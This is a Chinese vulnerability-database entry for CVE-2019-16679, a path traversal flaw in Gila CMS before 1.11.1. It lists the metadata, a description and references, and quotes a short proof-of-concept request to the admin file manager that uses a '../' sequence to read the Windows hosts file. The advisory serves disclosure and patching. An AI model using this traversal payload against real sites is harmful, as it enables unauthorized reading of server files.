Gila CMS 路径遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1751049 漏洞类型 路径遍历
发布时间 2019-09-24 更新时间 2019-09-30
CVE编号 CVE-2019-16679 CNNVD-ID CNNVD-201909-1026
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019090149
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201909-1026
|漏洞详情
Gila CMS是一套基于PHP和MySQL的开源内容管理系统(CMS)。 Gila CMS 1.11.1之前版本中存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。
|漏洞EXP
# Exploit Title: Authenticated Local File Inclusion(LFI) in GilaCMS
# Google Dork: N/A
# Date: 04-08-2019
# Exploit Author: Sainadh Jamalpur
# Vendor Homepage: https://github.com/GilaCMS/gila
# Software Link: https://github.com/GilaCMS/gila
# Version: 1.10.9
# Tested on: XAMPP version 3.2.2 in Windows 10 64bit,
# CVE : CVE-2019-16679

*********** *Steps to reproduce the Vulnerability* *************

Login into the application as an admin user or equivalent user and go the
below link

http://localhost/gilacms/admin/fm/?f=src../../../../../../../../../WINDOWS/system32/drivers/etc/hosts

################################################################
|参考资料

来源:github.com

链接:https://github.com/GilaCMS/gila/releases/tag/1.11.1


来源:github.com

链接:https://github.com/GilaCMS/gila/issues/33


来源:nvd.nist.gov

链接:https://nvd.nist.gov/vuln/detail/CVE-2019-16679